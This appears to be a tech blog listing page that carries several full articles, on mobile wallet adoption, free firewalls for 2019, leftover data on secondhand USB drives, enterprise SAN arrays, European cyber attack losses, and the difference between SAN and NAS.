While iPhones may still be enjoying good sales, Apple Pay, the country’s largest mobile payment player, is not seeing record-setting numbers. According to statistics from PYMNTS.com, less than 3% of iPhone users paid with the app during their most recent shopping trip – and only 6.8% of all iPhone owners used Apple Pay the last time they went to a store that accepted it.

Walmart Pay has also seen a similar adoption rate, with 5.9% of eligible adults using it during their last trip to Walmart. Samsung Pay has a usage rate of 4.6%, and consumers used Android Pay for 2.3% of all recent transactions. And perhaps most telling, in 2017, less than 1 in 20 consumers with a mobile wallet used it when they had the opportunity.

Mobile Woes

Why are consumers hesitant to pay via phone? For the most part, many consumers are perfectly happy to pay with cash and their cards and don’t feel the need to switch.

And unlike Visa or MasterCard, mobile wallets are hardly universal. Apple Pay, Android Pay and Samsung Pay are restricted to their respective devices. Walmart Pay has a higher overall usage rate because it can be accessed by anyone with a smartphone. For many consumers, switching between mobile wallets based on where they’re shopping creates unnecessary payment friction.

Still, as smartphones and internet connectivity reach a saturation point, consumers will likely start to view their phones more as banking and shopping devices. Mobile wallet transactions topped out at $718 billion in 2017. However, experts do expect that mobile payments will reach $800 billion this year, as Apple, Google, Samsung and PayPal increase their focus on mobile payments, and merchants ramp up their mobile capabilities.

One Wallet to Rule Them All

While the mobile wallet market is increasingly fragmented, the wallet that might stand the best chance of growth is PayPal, since it is not connected to a single payment brand. Along with its partnership with Venmo, PayPal represents the closest to a universal mobile wallet. Other global standouts include China’s Alipay and WeChat Pay.

The world will also see an increase of QR code-based, contactless mobile payment options like those seen from retailers like Walmart, CVS and Starbucks, as well as NFC-based mobile payments. There is a possibility that Walmart could expand its wallet app beyond its stores, while Amazon could venture into the mobile payments market.

While today’s mobile wallet market is fragmented and competitive, an increase in corporate acquisitions in 2019 will clear the way for a few top players who acquire and eliminate rival services.

Payments of the Future

When it comes to the growth of mobile wallets, the primary obstacle is bridging the gap between awareness and adoption. And while the future of money is increasingly mobile, security will always be the top priority of any payment system.

That’s why Bluefin offers our P2PE and tokenization solutions to ensure that sensitive payment data is encrypted the moment it enters your system – and is encrypted if you store payment data. To learn more about how you can protect your organization’s payment information, contact a Bluefin representative today.

Read More

Best Free Firewalls for 2019

While you might think it’s fine to rely on the firewalls built into your wifi router and device operating system, these may not be enough. Don’t worry if you don’t have spare cash for additional firewall software; we’ve found some great free firewalls for you to consider.

If you have a wifi router, you likely already have a measure of protection from intrusion in the form of a built-in hardware firewall. Additionally, you may have a software firewall built into your operating system, such as Windows Defender for Windows users. According to the AV Test Security Report 2017/2018, Windows is by far the most attacked operating system, so built-in protection makes sense.

However, these firewalls aren’t perfect and you may find yourself in need of extra protection. And it’s not just Windows users who should be concerned. No operating system is immune to attack, so no one should be complacent about the vulnerability of their internet-connected devices.

Installing antivirus software as well as an additional firewall is your best chance of keeping your equipment malware-free. Thankfully, you don’t have to break the bank when it comes to third-party software, or even pay a penny. We’ll cover each firewall in detail, but if you’re just looking for a quick list, these are the best free firewalls:

  1.  Sophos XG Firewall Home Edition
  2.  ZoneAlarm Free Firewall 2019
  3.  AVS Firewall
  4.  Avast Free Antivirus
  5.  Comodo Free Firewall
  6.  TinyWall
  7.  Outpost Firewall
  8.  GlassWire
  9.  Privatefirewall
  10. OpenDNS Home

The following sections will explain what each of these has to offer:

The Best Free Firewalls of 2019

You don’t need to pay for a top quality firewall because some of the leading cybersecurity companies produce free software that will protect your computer.

Here’s our list of the best free firewalls for 2019:

1. Sophos XG Firewall Home Edition

Sophos XG Firewall

Sophos is a rising star in the cybersecurity industry and its excellent business protection software is also available for home use. This security system is unusually advanced compared to the standard firewall software. It isn’t just a computer security system, it is a network security system.

Given that most homes now run multi-user wifi networks, the Sophos approach to whole home cybersecurity coverage is a concept that is long overdue. Essentially, you get all of the system protection controls that you would for a business, but for your home network.

That being said, there is a major infrastructure requirement of this free firewall that may put you off. Sophos XG has its own operating system (OS) and when you install it on a computer, it wipes out the existing OS and all software installed on that device. You won’t even be able to reinstall your Windows-compatible software once the Sophos XG OS is running. The host computer needs to have four cores and 6 GB of RAM.

If you have a spare computer, then this firewall option is light years ahead of the competition. It includes anti-malware, and gives you web security, connection privacy, and URL filtering. Within the network, you get application control, an Intrusion Prevention System (IPS), and traffic-shaping features. The console includes a network monitoring and reporting dashboard, providing all the system management facilities that large companies enjoy on their networks.

Download Sophos XG Firewall Home Edition

2. ZoneAlarm Free Firewall 2019

ZoneAlarm logo

ZoneAlarm Free Firewall installs on Windows 7, 8, 9, and 10. This system has some great extras, which makes it a good choice for home wifi networks and laptops that connect to the internet in public places. All you need to install it is an internet connection for the download and an email address for the activation.

The firewall includes a “stealth mode” which protects your connections from hackers, includes identity protection services, and blocks malware. If you are in the US, you can call on the company for victim recovery assistance in the case of identity theft.

The software will add an extra layer of protection to your connections when you connect to public wifi hotspots and it assesses the security of your home wifi network to improve protection from attacks. It updates itself automatically, so you benefit from an up-to-date threat protection database.

Download ZoneAlarm Free Firewall

3. AVS Firewall

AVS Firewall

The AVS brand is owned by Online Media Technologies Ltd. However, the company doesn’t make its firewall software easy to find on its website. Alternatively, you can download it from Tucows or Softpedia among other free software distribution sites. This firewall runs on all versions of Windows from XP to Windows 10.

The firewall will block incoming connection requests and it includes other security measures. These include the ability to select which applications on your computer are allowed to connect to the internet and a security level feature. The software monitors activity in the registry and blocks alterations. This is a very important protection measure against worms and persistent malware.

The AVS Firewall provides surfing protection as well as system security. These measures include an ad and popup blocker and parental controls. You can allocate bandwidth usage limits to devices, applications, or programs.

Download AVS Firewall

4. Avast Free Antivirus

Avast logo

Avast is a major player in the antivirus market and its AV software packages include firewalls. The company produces a free antivirus package that will give your home computer complete protection from cyber attacks. This software runs on Windows, MacOS, and Android.

The antivirus module of this package includes live updates for the threat database which gives you instant coverage when the company discovers a new virus. The software also creates a Sandbox environment on your computer. This is useful if you like to download new software from untrusted sources as you can try out your new utility without the risk of it releasing hidden viruses onto your computer.

Wifi security in this package monitors for intruders and network weaknesses, and online protection includes a password locker and fake site detection that guards against DNS hijacking.

Download Avast Free Antivirus

5. Comodo Free Firewall

Comodo logo

Comodo is an award-winning cybersecurity software house that produces a firewall for all versions of Windows from XP through to Windows 10. The paid firewall has a free alternative, which the company claims is the world’s #1 free firewall.

As well as blocking incoming connections, this software package will monitor your computer for ongoing threats, with a constantly updated threat database. The monitor alerts you in real-time to detected risks. You get a Sandbox environment for any new software you download to protect from hidden viruses. The system uses AI to build up a profile of normal operating behavior on your computer so that it can block suspicious activity. You can choose to block specific applications from accessing the internet while the software monitors all outgoing traffic as well as inbound data.

Other features include a browser cleanup utility and a games mode to enable interactive applications to operate over the internet.

Download Comodo Free Firewall

6. TinyWall

TinyWall logo

The developer of TinyWall, Károly Pados, came up with the clever idea of producing an enhancement for the native Windows firewall, Windows Defender. So, unsurprisingly, this utility is only available for Windows.

The ethos behind the development of TinyWall is that it should be unobtrusive. The program runs all the time and shows as an icon in the system tray. You click on the icon to view the popup menu of the system. This means that threat information is available on demand. The good point about that is that you won’t get your computer frozen by an overlay when you are in the middle of something. However, on the downside, threat alerts are easy to ignore, which is a risk.

As a free utility that’s meant to be lightweight (it only takes up 1 MB of space on your hard drive), this firewall doesn’t have many features. You can whitelist applications to prevent your important programs from being blocked, but that’s about it.

Download TinyWall

7. Outpost Firewall

Outpost Firewall logo

The maker of Outpost, Agnitum Ltd, was sold to Yandex, the Russian Google, in 2017 and at that point shut down its own website. You can’t get this firewall directly from the company anymore, but it is available from software distribution sites, such as Filehippo and Softonic.

You might wonder why a seemingly abandoned firewall is on this list. It’s here because it deserves to be. Agnitum licensed its firewall to other security companies, so this is actually the firewall that you get from other big name cybersecurity providers, including Sophos. Although the paid Outpost Firewall Pro is no longer supported, the free firewall is still going strong.

Features of this excellent security utility include automatic whitelisting for well-known software, an anti-leak module that blocks suspicious outgoing messages, a file and folder lock, and an ad and popup blocker for web surfers.

Download Outpost Firewall

8. GlassWire

GlassWire logo

GlassWire is network monitoring software as well as a firewall, and it’s free to use. This package installs on Windows 7, 8, and 10. Although this software would be ideal for a small business network, it’s also marketed for home use. The firewall can be set up with several profiles so it behaves differently in each given scenario. For example, you can have a home network setting and a public wifi profile.

As well as blocking incoming connections, the suite enables you to monitor bandwidth usage, throttling some apps to make more bandwidth available to key applications. The traffic management functions go down to port number, program, and process.

The monitor is always on and it tracks all activity on your computer, looking for suspicious anything suspicious. Like TinyWall, the firewall functions of GlassWire are actually just a management interface to the native Windows Defender.

Download GlassWire

9. Privatefirewall

Privatefirewall

Privatefirewall is a product of Privacyware. The company’s feature product is ThreatSentry, a security system designed for business networks. The company is not so interested in Privatefirewall anymore and it doesn’t even mention the product on its own website. However, you can download it for free from software distributors, such as CNet, and Softpedia. The program will run on Windows from XP up to 8.1 – there isn’t a version for Windows 10.

As well as being a firewall, this utility is a host-based intrusion detection system. It examines the log files on your computer to look for worrying events. It will also protect those log files from unauthorized alteration or deletion, which is a track-covering trick that some malware uses.

The regular firewall features of this suite include whitelisting and blacklisting functions, as well as content privacy controls such as text copy shutdown and clipboard monitoring. The interface for the firewall is a popup context menu that you activate by right-clicking on the program icon in the system tray.

The tool will also monitor email activity, disable infected or banned websites from loading, and block internet activity from a specified address.

Download Privatefirewall

10. OpenDNS Home

OpenDNS logo

OpenDNS is a business network security system that also has a free Home edition. This firewall covers all of the internet-active devices in your home, including DVRs and smart TVs, computers, tablets, and smartphones. It’s a great choice for families because it includes parental controls.

This system is cloud-based, so you don’t have to install any software. Instead, the service changes your router settings to channel all of your internet traffic through the OpenDNS server. This is what the industry calls an “edge service” and it will also protect you from other hacker actions, such as DDoS attacks.

Sign up for OpenDNS Home

Do I need a third-party firewall?

Businesses religiously install firewalls to protect their resources from attack, but the general public has become less interested in this form of protection. A big reason for this complacency is that protection is often built in to devices.

At home, wifi routers offer protection against attack from the internet in the form of a hardware firewall. However, the advent of Trojans means that this incoming connection request block is no longer enough; Trojans will open up outgoing connections back to base and invite in other viruses.

Popular operating systems often come with their own software firewall, such as Windows Defender in newer versions of Windows. However, this is a rudimentary firewall that could do with a lot more options, which you get with third-party firewalls.

Note that if you do have firewalls built in to your router or operating system, you need to make sure they’re enabled. A disabled firewall is as useless as not having one at all.

Read More

Two-thirds of secondhand USB drives still contain previous owners’ data: study

68 percent of secondhand USB flash drives sold in the US, and 67 percent sold in the UK, still contain recoverable data from their previous owners, according to a new study by the University of Hertfordshire and commissioned by Comparitech.

University of Hertfordshire researchers purchased 200 USB memory sticks—100 in the US, 100 in the UK—from eBay, secondhand shops, and traditional auctions. Our latest research sought to find out how many of the USB drives still contained data, what was contained in that data, and whether any attempt had been made to remove the data.

Two-thirds of USB drives still contained remnant data from previous users. Within them, researchers discovered a wide range of intimate, private, and sensitive files.Nude photos, business documents, ID scans, job applications, wage slips, private memos, tax statements, receipts, and medical documents were found among the trove of data.

The data recovered from secondhand USB drives could be used for a wide range of crimes, including targeted phishing, identity theft, and extortion. “One of the criteria that the study applied to the recovered data was to ask ‘would this data be of value to a cybercriminal?’” says Andrew Jones from the Cyber Security Centre at the University of Hertfordshire. “If a person can be identified in sufficient detail (name, address, email, phone number), then this information has potential value to a criminal for identity theft.”

Researchers conducted their analysis using publicly available software that can be downloaded from the web.

The research team split up the results by country. Here’s a breakdown of the 100 cards from the US:

  • Only one USB drive appeared to have no attempt made to remove the data
  • 18 were wiped using a data erasing tool and no data could be recovered
  • Eight were formatted, but data could be recovered “with minimal effort”
  • 64 had data deleted, but it could easily be recovered
  • 6 drives were not accessible and could not be read using the tools available
  • The previous owner could be identified in 20 cases

… and the 100 from the UK:

  • 19 had no attempt made to remove the data
  • One was encrypted with BitLocker (not recoverable)
  • 16 were properly wiped and no data could be recovered
  • 16 were formatted, but data could still be recovered “with minimal effort”
  • 47 had data deleted, but it could be easily recovered
  • 1 was not accessible and could not be read
  • The previous owner could be identified in 22 cases

The biggest difference between the two countries was the number of drives sold without having had any attempt made to erase data beforehand. The study notes, “In the USA, there appears to be a greater level of awareness of the issue and only one of the purchased USB memory sticks had not had any effort made to remove the data, whereas in the UK there were 19.”

Despite Americans’ greater efforts to remove data from USB drives before selling them, the proportion of USB flash drives from which data could be recovered was almost equal in the UK and the USA at 68 percent and 67 percent, respectively.

This study concurs with our similar study by the same university on secondhand memory cards, such as SD and microSD cards. That research, carried out in conjunction with Comparitech last year, found that 65 percent of secondhand memory cards still contained personal data from their previous owners.

What did the USB drives contain?

Researchers noted that the types of data found on USB flash drives varied somewhat by country. Americans’ USB sticks contained more business documents, while those in the UK contained more personal information.

The risks of leaving data on secondhand USB flash drives and memory cards seems obvious, so what researchers found on some of the USB flash drives might surprise you. Some notable cases include:

  • Nude images of a middle-aged man along with name and contact details
  • A collection of photos of bundles of money and shotguns. A search warrant giving the name of the person to be searched, a forfeiture submission for the seizure of drugs giving the name of the person that had their property seized, A forensic laboratory report on evidence submitted and a letter of resignation from a law enforcement officer.
  • Chemical, fire, and power safety documents for a project in Cardiff, along with risk assessment documents and the name of the owner
  • Laboratory reports for a petrochemical company, along with the name and National Insurance number (SIN) of the USB drive’s owner
  • Documents containing the stock exchange dealings of a trader along with their passport and addresses in France in the UK for the past six years
  • Wage slips and tax statements with name, address, and contact details
  • Photos of a soldier including a deployment screening sheet containing his home and duty addresses
  • A resume and filled-out W-4 tax form with full name and address

Why do people leave data on secondhand USB drives?

The cause of this problem is twofold, according to the research:

  • First, not enough people are aware of the risks of leaving data on USB drives before selling them.
  • Second, those that do make an effort to erase the data don’t do it properly, so the data can still be recovered.

Jones tells Comparitech, “There are a number of solutions that are already easily and freely available, such as media wiping tools, encryption, and the low level formatting of the media, but this is more an issue of the user not being aware that even though they cannot see it, the data does not go away when they delete itor do a high level format.”

Simply dragging files into the trash can or highlighting them and hitting the “Delete” key does not permanently erase data from a USB drive. Similarly, formatting a USB drive still leaves recoverable remnant data. To fully erase data, it the storage area containing it must be overwritten, preferably by secure data erasure software. Read our guide on how to securely erase SD cards and flash drives to learn more.

The onus of responsibility is on both previous owners and secondhand sellers. It’s quite possible that sellers simply plug in the USB drive, see that it’s empty, and put it up for sale without bothering to properly wipe remnant data.

The tools required to properly wipe a device are often free and even built into device operating systems. The authors of the study note that there’s plenty of free and publicly available information out there (including ours) saying as much, but it apparently never reached many sellers of secondhand devices. Researchers suggests one reason might be that USB memory sticks are fairly cheap and therefore sellers, perceiving them as low value, do not consider the potential value of the data they contain.

In some cases, online sources erroneously suggest wiping devices using a “Quick Format” on Windows, which leaves recoverable remnant data on devices. A full format is necessary to completely overwrite remnant data.

Despite proper data destruction being easy and information about it being prevalent, people still fail to do it. The researchers say the causes might be a lack of understanding of how to properly delete data, a lack of concern in an era of social media and data sharing, or a failure to understand the risks of exposing personal data.

“There have been efforts by Government and a number of other organisations to educate users, but these are not having a significant effect,” Jones explains. “This is probably due to people not considering the effect of aggregation of data on the media over time and that a number of individual elements of data that appear to have no value can be viewed as a whole to develop a rich picture of the user.”

Portable storage

The storage capacity of the drives used in our study varied widely, from a mere 64 MB to 128 GB. The study says USB memory sticks are primarily used to move files from one computer to another, or as a form of backup storage. That means any files stored on USB flash drives were purposely stored there, which is slightly different than data stored on a computer hard disk.

Although storage demand continues to grow, that storage won’t necessarily exist on end user devices in the long term. As broadband speeds increase and memory gets cheaper to manufacture, remote cloud storage and online file transfers could mitigate the amount of personal data we put on USB flash drives.

Read More

Enterprise and midrange SAN survey 2019: Hitachi, IBM, and NetApp

Part two of two: While all-flash is mainstream, NVMe is an option as disk replacement for most suppliers, while NetApp leads the way with NVMe end-to-end to hosts

As noted in the first piece, the key products of the big five storage array makers – Dell EMC, HPE, Hitachi, IBM, and NetApp – are primarily offered as all-flash storage, with hybrid flash and spinning disk as options too.

However, we noted that flash is where the key boundaries of innovation lie, with non-volatile memory express (NVMe) flash drives available in high-end enterprise arrays from Dell EMC, IBM and NetApp, with only HPE bucking the trend by using NVMe as connectivity for storage-class memory as a cache layer – This is set for inclusion in Dell EMC’s Powermax high-end arrays too.

Standard spec/features include input/output per second (IOPS) that run into the millions and capacities that go to several tens or beyond of petabytes (PB), Fibre Channel and iSCSI connectivity to hosts, with mainframe in a small number of products (notably from IBM and Hitachi in this article), plus Dell EMC in the first. Dual controllers, replication, snapshots, encryption, thin provisioning and data reduction are also common to most.

As mentioned, when it comes to the cloud, all the array makers have some way of using the cloud as a tier, which we have looked at here.

In this article, we’ll look at Hitachi’s VSP F- and G-series, IBM’s FlashSystem, StorWize and DS arrays, plus finally NetApp’s AFF/FAS, Solidfire and E/EF-series.

The accompanying piece examined Dell EMC’s VMAX/PowerMax, Xtremio, Unity, SC, and PowerVault ME4 products, plus HPE’s 3PAR and Nimble arrays.

Hitachi

Hitachi Vantara’s VSP F-series all-flash enterprise SAN storage comes in three models: the F700, F900 and F1500. These are claimed to deliver 1.4, 2.4 and 4.8 million IOPS respectively.

They are enterprise-scale storage area network (SAN) arrays with capacity for 864, 1,152, and 2,304 drives respectively, which gives a raw maximum capacity of between 6PB and 8PB.

For the two smaller arrays, connectivity is via 16Gbps or 32Gbps Fibre Channel or iSCSI with 10Gbps Ethernet. The F1500 has Fibre Channel plus (mainframe) FICON, both at 8Gbps and 16Gbps, plus Fibre-Channel-over-Ethernet at 10Gbps.

A pair of midrange F-series arrays – the F350 and F370 – offer a claimed 600,000 IOPS and 1.2 million IOPS with 192 or 288 drive slots for maximum raw capacity of 2.8PB or 4.3PB. Connectivity is 16Gbps and 32Gbps Fibre Channel plus 10Gbps iSCSI/Ethernet.

Meanwhile, the VSP G350, G3700 and G900 hybrid flash arrays range from entry-level maximum capacity of a couple of PB to 35PB, depending on the drives used, which can be a mixture of 2.4TB and 6TB spinning disk as well as up to 15TB flash.

Performance ranges from 600,000 IOPS to 4.8 million. Connectivity is similar to the F-series, with mainframe connectivity in the G1500 top-of-the-range model.

IBM

FlashSystem: IBM’s FlashSystem products all come with TLC flash drives. The V9000 scales out to eight controllers and disk shelves, or from 43TB to 1.7PB, with IOPS of between 1.3 million and 5.2 million. Connectivity is up to 16Gbps Fibre Channel and 10Gbps iSCSI and Fibre Channel-over-Ethernet.

The V9100 comes with NVMe modules and claims between 2.5 million IOPS and 10 million IOPS for a clustered configuration.

Meanwhile, the FlashSystem A9000 offers TLC flash capacity from just over 100TB up to 1.2PB (both are effective, not raw figures) with up to 900,000 IOPS.

The FlashSystem A9000R comes in three size configurations: 72TB to 144TB, 170TB to 340TB, and 360TB to 720TB – all raw capacities. IOPS is 2.4 million for all three and connectivity is Fibre Channel and iSCSI to 16Gbps and 10Gbps respectively.

The FlashSystem 900 offers 13TB per 2U box with 1.1 million IOPS read-only, and around 800,000 IOPS with 70/30 read/write.

StorWize: IBM’s StorWize V5030F can house up to 760 drives (or double that in a clustered configuration), which, with 15TB flash drives, makes for around 22PB maximum capacity. IBM Spectrum Virtualize software (formerly SAN Volume Controller) allows for storage virtualisation across disparate devices.

StorWize V7000F scales up to 3,040 drives, making for about 44PB raw capacity.

Minus the F suffix, StorWize provides hybrid flash array functionality.

DS series: IBM’s DS8000F series are its all-flash arrays aimed at mainframe use cases. There are three models that come in different capacities up to 1.2PB and connectivity via 8Gbps and 16Gbps Fibre Channel and FICON.

The DS8880 is IBM’s hybrid flash SAN array family, which comes in capacities up to about 5PB, of which approximately one sixth – in terms of drive bays/card slots – can be solid state. Once again, the DS brings mainframe compatibility.

NetApp

AFF/FAS: NetApp’s AFF series – All-Flash FAS – come in five models that scale from clusters of two to 24 nodes (12 HA pairs) with maximum effective capacities that run up to 700-plus TB per node and the low hundreds of PB (after data reduction) in maximum-sized clusters. Out of these the AFF800 is NVMe-equipped, and offers latency under 200µs with claimed end-to-end NVMe connectivity, including over Fibre-Channel.

NetApp’s FAS line continues as a set of hybrid flash arrays, with the FAS2700, 8200 and 9000 series. The SME/mid-size 2700 starts at 10TB and can scale to 17PB in a 24-node cluster. The 9000 scales to 176PB.

Solidfire: The Solidfire all-flash storage product that NetApp acquired in 2015 come in a 1U form factor and three models, the H610S-1, H610S-2 and H610S-4.

They each hold 12 flash drives of 960GB, 1.92TB or 3.84TB for total capacity of 11.5TB, 23TB or 46TB.

With data reduction – data deduplication, compression and thin provisioning – effective capacity is upped by between 3x and 9x.

Solidfire started out targeted at cloud service providers and is Fibre Channel and iSCSI block storage.

EF- and E-series: NetApp’s E-Series arrays date back to NetApp’s acquisition of Engenio in 2011, whose arrays were designed for spinning disk. They run the SanTricity operating system, which is a legacy of that pedigree.

There are two all-flash arrays in the series, the EF280 and EF570, which offer 300,000 IOPS and 1 million IOPS respectively in hardware for 96 and 120 drives, plus maximum raw capacity that goes up to around 1.5PB with expansion shelves.

Meanwhile, there are two spinning disk E-series arrays, the E5724 and the E5760, with 24 and 60 drives respectively. The E5724 can scale to 120 flash drives and 180 HDDs, while the E5760 can accommodate 120 and 480 of each.

Read More

More than half of EU firms report cyber attack losses

More than half of European firms admit business disruption and data loss due to cyber attacks in the past 24 months, with UK firms among the most targeted, a survey shows

One in five IT decision-makers claimed cyber attackers left no clue to their identity, while 54% said they had faced at least one attack in the past two years that resulted in some sort of disruption, a survey has revealed.

This disruption was in the form of service disruption (31%), data integrity issues (18%) and data loss (15%), according to the poll of nearly 2,000 European firms by security firm Kaspersky Lab.

Organisations in the UK and Spain faced the highest risks, the survey found, with 64% of respondents confirming they had been hit by cyber attacks in the past two years.

Despite traditionally having bigger IT budgets than small businesses, 64% of enterprises said they had been hit by a cyber attack that caused some disruption, in contrast to just 45% of small and medium-sized businesses.

The survey confirmed that cyber attacks were not diminishing, with more than one in five respondents (21%) saying the number of cyber attacks on their business had increased in the past 12 months, compared with the previous year, while for 42% it had stayed roughly the same.

Kaspersky Lab said that while it was good that more than two-thirds (72%) of the organisations said they had found out about a breach in eight hours or less, that left a “shocking” 25% of businesses which failed to take action during the first hours after the attack because they did not realise they had been breached until later.

As previous research found, Kaspersky Lab said the detection speed was crucial to lowering the financial impact of an attack. The research found that where breaches were detected immediately, recovery costs were typically around £456,000, compared with £1.2m for enterprises that took more than a week to detect a threat that had entered their perimeter.

David Emm, principal security researcher at Kaspersky Lab UK, said the survey findings indicated that the odds of a business falling victim to costly cyber attacks had increased dramatically. “This should act as a stark warning for business owners and IT decision-makers to strengthen their defences,” he said.

The results of the survey, said Emm, also confirmed another trend that the cyber security industry has been warning about for a while.

“The survey shows that attackers sneak throughout the organisation and sometimes leave few or no traces, making the challenge for investigators increasingly difficult, as well as underlining the importance of cooperation among cyber security professionals,” he said.

Read More

SAN vs NAS: Difference Between Storage Area Network and Network Attached Storage

When you are looking for local storage for business, there come two options: NAS (Network Attached Storage) and SAN (Storage Area Network). Today you will find out whether it is NAS or SAN that fits your needs.

What Is NAS?

Network Attached Storage (NAS) is a device for storing data over the network. It has dedicated hardware and a pre-installed by manufacturer OS. The main characteristic of the NAS is the number of bays you can insert hard drives into. From the hardware standpoint  you need to be aware of the NAS CPU and RAM.

NAS is a computerized box for hard drives that can be accessed by multiple users or applications over the network.

This is a Synology NAS device

This is a Synology NAS device

ypical NAS use cases:

  • Data storage
  • File sharing
  • Backup

NAS should be connected to a local network. It then can be accessed by multiple users. It can also be configured as a network share for simpler user access.

Network storage devices do not have pre-installed hard drives – you should choose them.

Typical NAS infrastructure model

Typical NAS infrastructure model

What Is SAN?

Storage Area Network (SAN) is an array of disks, which are attached to the server via a special network. In SAN you get access directly to the storage, as if it was your local hard drive. That makes storage area network fast if configured correctly.

The right SAN infrastructure consists of a dedicated network typically relying on a fiber-optics, enterprise-grade storage systems, and special connecting hardware. The wrong SAN setup leads to network overload and instability.

SAN is a bunch of disks that act as one storage device over a network.

Typical SAN infrastructure model

Typical SAN infrastructure model

The management of the IT infrastructures with SAN requires a knowledge of low-level block protocols and their hardware and software medium, such as FC switches, optical cables, SCSI-powered protocols, etc.

SAN switch with optical Fibre Channel connectors

SAN infrastructure implementation costs are high from a hardware and management perspective.

Typical SAN use cases:

  • High speed server transactions
  • Data mirroring

SAN switch with optical Fibre Channel connectorsNAS can also be made faster by using the high-end devices, routing planning, using a dedicated network and overall optimizations. Both storage solutions are often used within one organization. You may have a file server for storing user files and a block storage for the disaster recovery at the same time.

Conclusion: SAN vs NAS Comparison Chart

Now you are aware of fundamental differences between SAN and NAS devices and can find your bearing on the storage technologies ground. We have created a comparison chart with the key features of both storage types so you could choose the right one.

SANNAS
Block-level accessFile-level access
High performance due to the infrastructure nature, commonly fasterHigh performance can be achieved using the network and software optimization, commonly slower
May be configured in a very custom wayEasy to configure a basic data storage use case
Needs changes in the existing networkMay be published in a network as it is
Needs separate servers for application or user accessIndependent device with server functions
Suitable for any appsSuitable for latency-tolerant apps
Grants read and write access for multiple users using external managerGrants read and write access for multiple users out of the box
Costs more due to the infrastructure expensesCheaper due to the simplicity of deployment
Durable
Scalable
Effective for big data or performance-crucial businessCan be handy for a business of any size

Should You Choose a NAS or a SAN?

Whereas NAS is an endpoint device, SAN is a network of devices that act as  one. Network area storage device is far simpler and cheaper to buy and maintain. Setting up a storage area network requires knowledge, practice and continuous maintenance. It also costs a lot to build one.

If you need storage for backup or data sharing within small teams – you are better off with a NAS.

If you require high input/output speeds, you have servers and applications that need to communicate with each other – hire a professional to build you a SAN.

Read More